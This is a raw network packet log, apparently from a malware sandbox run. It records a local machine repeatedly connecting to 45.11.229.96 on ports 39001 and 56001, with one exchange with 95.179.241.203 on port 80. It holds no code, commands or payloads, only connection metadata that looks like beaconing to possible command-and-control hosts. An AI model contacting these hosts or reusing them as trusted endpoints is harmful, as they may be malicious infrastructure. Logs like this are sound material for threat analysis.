Sep 19, 2024 02:28:24.641515970 CEST	49932	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:24.648619890 CEST	39001	49932	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:24.650300026 CEST	49932	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:24.661926031 CEST	39001	49932	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:24.719342947 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:24.721812963 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:24.723262072 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:24.731154919 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:24.734294891 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:24.739772081 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:25.260956049 CEST	39001	49932	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:25.261018991 CEST	49932	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:25.264750004 CEST	49932	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:25.269834042 CEST	39001	49932	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:25.457242012 CEST	49933	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:25.462476969 CEST	39001	49933	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:25.466314077 CEST	49933	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:25.847632885 CEST	49933	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:26.141211033 CEST	49933	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:26.641221046 CEST	49933	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:26.803288937 CEST	39001	49933	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:26.803318977 CEST	39001	49933	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:26.803345919 CEST	39001	49933	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:26.985572100 CEST	39001	49933	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:26.985789061 CEST	49933	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:26.985789061 CEST	49933	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:26.990884066 CEST	39001	49933	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:27.118788004 CEST	49934	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:27.133495092 CEST	39001	49934	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:27.133608103 CEST	49934	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:27.803131104 CEST	49934	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:27.808106899 CEST	39001	49934	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:27.809012890 CEST	49934	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:27.819498062 CEST	39001	49934	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:28.280041933 CEST	39001	49934	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:28.282191038 CEST	49934	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:28.313235044 CEST	49934	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:28.318248987 CEST	39001	49934	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:28.544239044 CEST	49935	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:28.549287081 CEST	39001	49935	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:28.550328970 CEST	49935	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:29.467329025 CEST	49935	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:29.472392082 CEST	39001	49935	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:29.472474098 CEST	49935	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:29.477334976 CEST	39001	49935	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:29.981587887 CEST	39001	49935	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:29.981812000 CEST	49935	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:29.981847048 CEST	49935	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:29.986680984 CEST	39001	49935	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:30.109397888 CEST	49936	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:30.114705086 CEST	39001	49936	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:30.114804983 CEST	49936	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:30.960053921 CEST	49936	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:30.965559006 CEST	39001	49936	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:30.966325045 CEST	49936	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:30.971209049 CEST	39001	49936	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:31.386523008 CEST	39001	49936	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:31.390322924 CEST	49936	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:31.390443087 CEST	49936	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:31.395277977 CEST	39001	49936	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:31.501470089 CEST	49937	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:31.506516933 CEST	39001	49937	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:31.510365009 CEST	49937	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:31.541630030 CEST	49937	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:31.546566010 CEST	39001	49937	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:31.550322056 CEST	49937	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:31.555133104 CEST	39001	49937	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:32.157408953 CEST	39001	49937	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:32.157476902 CEST	49937	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:32.157582045 CEST	49937	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:32.162756920 CEST	39001	49937	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:32.267164946 CEST	49938	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:32.272296906 CEST	39001	49938	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:32.274308920 CEST	49938	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:32.506495953 CEST	49938	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:32.511604071 CEST	39001	49938	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:32.514311075 CEST	49938	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:32.519418955 CEST	39001	49938	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:32.888063908 CEST	39001	49938	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:32.890321970 CEST	49938	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:32.890419960 CEST	49938	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:32.895374060 CEST	39001	49938	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:33.001530886 CEST	49939	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:33.006540060 CEST	39001	49939	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:33.010324001 CEST	49939	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:33.050966024 CEST	49939	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:33.055924892 CEST	39001	49939	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:33.058315992 CEST	49939	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:33.067081928 CEST	39001	49939	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:33.670164108 CEST	39001	49939	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:33.670279026 CEST	49939	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:33.670382977 CEST	49939	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:33.675236940 CEST	39001	49939	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:33.782592058 CEST	49940	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:33.787669897 CEST	39001	49940	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:33.787775040 CEST	49940	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:33.814205885 CEST	49940	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:33.819835901 CEST	39001	49940	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:33.819927931 CEST	49940	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:33.824749947 CEST	39001	49940	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:34.411659956 CEST	39001	49940	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:34.414453030 CEST	49940	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:34.414453030 CEST	49940	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:34.419713020 CEST	39001	49940	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:34.532912970 CEST	49941	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:34.538104057 CEST	39001	49941	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:34.538218975 CEST	49941	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:34.580064058 CEST	49941	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:34.585213900 CEST	39001	49941	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:34.586309910 CEST	49941	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:34.591265917 CEST	39001	49941	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:35.221719027 CEST	39001	49941	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:35.221808910 CEST	49941	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:35.222176075 CEST	49941	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:35.227020025 CEST	39001	49941	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:35.411087036 CEST	49942	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:35.416146994 CEST	39001	49942	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:35.416215897 CEST	49942	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:36.491756916 CEST	49942	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:36.496815920 CEST	39001	49942	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:36.496891975 CEST	49942	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:36.501765966 CEST	39001	49942	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:36.881722927 CEST	39001	49942	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:36.882317066 CEST	49942	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:36.882472992 CEST	49942	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:36.887279034 CEST	39001	49942	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:37.001533985 CEST	49943	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:37.008145094 CEST	39001	49943	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:37.010350943 CEST	49943	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:37.116158009 CEST	49943	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:37.123855114 CEST	39001	49943	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:37.126194954 CEST	49943	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:37.134345055 CEST	39001	49943	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:37.649348021 CEST	39001	49943	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:37.650356054 CEST	49943	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:37.653112888 CEST	49943	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:37.658143044 CEST	39001	49943	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:37.890748978 CEST	49944	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:37.896003008 CEST	39001	49944	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:37.896094084 CEST	49944	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:38.239243031 CEST	49944	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:38.244259119 CEST	39001	49944	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:38.244352102 CEST	49944	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:38.249180079 CEST	39001	49944	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:38.536986113 CEST	39001	49944	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:38.537087917 CEST	49944	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:38.537288904 CEST	49944	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:38.542151928 CEST	39001	49944	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:38.642087936 CEST	49945	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:38.647031069 CEST	39001	49945	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:38.647176981 CEST	49945	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:39.206264973 CEST	49945	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:39.211553097 CEST	39001	49945	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:39.211621046 CEST	49945	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:39.216494083 CEST	39001	49945	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:39.546802044 CEST	39001	49945	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:39.550352097 CEST	49945	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:39.550498962 CEST	49945	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:39.555280924 CEST	39001	49945	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:39.657911062 CEST	49946	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:39.662791967 CEST	39001	49946	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:39.662895918 CEST	49946	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:40.459225893 CEST	49946	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:40.464283943 CEST	39001	49946	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:40.464378119 CEST	49946	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:40.469491959 CEST	39001	49946	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:40.887742043 CEST	39001	49946	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:40.887794971 CEST	49946	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:40.888159990 CEST	49946	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:40.892990112 CEST	39001	49946	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:41.046183109 CEST	49947	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:41.051065922 CEST	39001	49947	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:41.051127911 CEST	49947	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:41.561489105 CEST	49947	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:41.781640053 CEST	39001	49947	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:41.782191992 CEST	49947	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:41.786998987 CEST	39001	49947	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:42.267491102 CEST	39001	49947	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:42.267612934 CEST	49947	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:42.267755985 CEST	49947	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:42.272555113 CEST	39001	49947	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:42.376529932 CEST	49948	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:42.381517887 CEST	39001	49948	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:42.381598949 CEST	49948	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:42.408690929 CEST	49948	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:42.413623095 CEST	39001	49948	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:42.413695097 CEST	49948	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:42.418504953 CEST	39001	49948	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:43.052484989 CEST	39001	49948	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:43.052568913 CEST	49948	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:43.052716017 CEST	49948	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:43.057543993 CEST	39001	49948	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:43.157660007 CEST	49949	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:43.162617922 CEST	39001	49949	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:43.165386915 CEST	49949	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:43.198396921 CEST	49949	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:43.203423977 CEST	39001	49949	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:43.208026886 CEST	49949	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:43.212877035 CEST	39001	49949	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:43.807271957 CEST	39001	49949	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:43.807348013 CEST	49949	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:43.807574987 CEST	49949	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:43.812357903 CEST	39001	49949	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:43.924000025 CEST	49950	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:43.928977013 CEST	39001	49950	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:43.929058075 CEST	49950	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:43.984146118 CEST	49950	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:43.989159107 CEST	39001	49950	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:43.989207983 CEST	49950	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:43.994029045 CEST	39001	49950	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:45.108757019 CEST	39001	49950	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:45.108822107 CEST	39001	49950	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:45.108917952 CEST	49950	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:45.108944893 CEST	39001	49950	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:45.108994961 CEST	49950	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:45.109055042 CEST	49950	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:45.220545053 CEST	49951	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:45.422523022 CEST	49950	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:45.526741028 CEST	39001	49950	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:45.526806116 CEST	49950	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:45.528564930 CEST	39001	49950	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:45.528630972 CEST	39001	49951	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:45.528657913 CEST	39001	49950	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:45.528704882 CEST	49951	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:45.528729916 CEST	49950	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:46.117738008 CEST	49951	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:46.122571945 CEST	39001	49951	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:46.124435902 CEST	49951	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:46.129265070 CEST	39001	49951	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:46.446208954 CEST	80	49730	95.179.241.203	192.168.2.6
Sep 19, 2024 02:28:46.532013893 CEST	49730	80	192.168.2.6	95.179.241.203
Sep 19, 2024 02:28:46.595118046 CEST	39001	49951	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:46.595330954 CEST	49951	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:46.595438957 CEST	49951	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:46.600198030 CEST	39001	49951	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:46.713622093 CEST	49952	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:46.718713999 CEST	39001	49952	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:46.718784094 CEST	49952	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:46.752676010 CEST	49952	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:46.757658005 CEST	39001	49952	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:46.757730961 CEST	49952	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:46.762553930 CEST	39001	49952	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:47.361165047 CEST	39001	49952	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:47.361236095 CEST	49952	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:47.361391068 CEST	49952	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:47.366302967 CEST	39001	49952	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:47.470316887 CEST	49953	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:47.475270987 CEST	39001	49953	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:47.475359917 CEST	49953	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:47.754683971 CEST	49953	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:47.759531021 CEST	39001	49953	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:47.761240959 CEST	49953	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:47.766084909 CEST	39001	49953	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:48.106486082 CEST	39001	49953	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:48.106563091 CEST	49953	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:48.106681108 CEST	49953	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:48.113074064 CEST	39001	49953	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:48.220612049 CEST	49954	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:48.229475021 CEST	39001	49954	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:48.229543924 CEST	49954	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:48.469394922 CEST	49954	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:48.474327087 CEST	39001	49954	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:48.474415064 CEST	49954	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:48.479262114 CEST	39001	49954	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:48.862102032 CEST	39001	49954	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:48.862250090 CEST	49954	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:48.862359047 CEST	49954	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:48.867048979 CEST	39001	49954	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:48.970307112 CEST	49955	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:48.975137949 CEST	39001	49955	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:48.975260019 CEST	49955	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:49.029467106 CEST	49955	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:49.034343958 CEST	39001	49955	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:49.034451008 CEST	49955	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:49.039170027 CEST	39001	49955	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:49.606343031 CEST	39001	49955	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:49.606396914 CEST	49955	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:49.606549978 CEST	49955	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:49.611304045 CEST	39001	49955	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:49.720957994 CEST	49956	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:49.727025032 CEST	39001	49956	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:49.727180958 CEST	49956	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:49.767304897 CEST	49956	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:49.772133112 CEST	39001	49956	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:49.772212029 CEST	49956	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:49.779308081 CEST	39001	49956	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:50.387538910 CEST	39001	49956	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:50.388541937 CEST	49956	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:50.388541937 CEST	49956	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:50.394577026 CEST	39001	49956	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:50.502499104 CEST	49957	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:50.507596970 CEST	39001	49957	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:50.510473013 CEST	49957	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:50.551588058 CEST	49957	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:50.556626081 CEST	39001	49957	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:50.562038898 CEST	49957	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:50.566838026 CEST	39001	49957	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:51.163100004 CEST	39001	49957	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:51.163208961 CEST	49957	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:51.163324118 CEST	49957	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:51.168732882 CEST	39001	49957	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:51.280575991 CEST	49958	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:51.285633087 CEST	39001	49958	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:51.285701036 CEST	49958	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:51.855931997 CEST	49958	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:51.860985994 CEST	39001	49958	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:51.861062050 CEST	49958	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:51.865876913 CEST	39001	49958	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:52.100385904 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:52.105550051 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:52.105659008 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:52.110471010 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:52.312242031 CEST	39001	49958	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:52.312319040 CEST	49958	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:52.312448025 CEST	49958	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:52.317554951 CEST	39001	49958	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:52.465039015 CEST	49959	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:52.470015049 CEST	39001	49959	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:52.470115900 CEST	49959	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:52.540750027 CEST	49959	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:52.545687914 CEST	39001	49959	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:52.545821905 CEST	49959	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:52.550606966 CEST	39001	49959	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:52.582755089 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:28:52.719399929 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:28:52.723607063 CEST	56001	49712	45.11.229.96	192.168.2.6
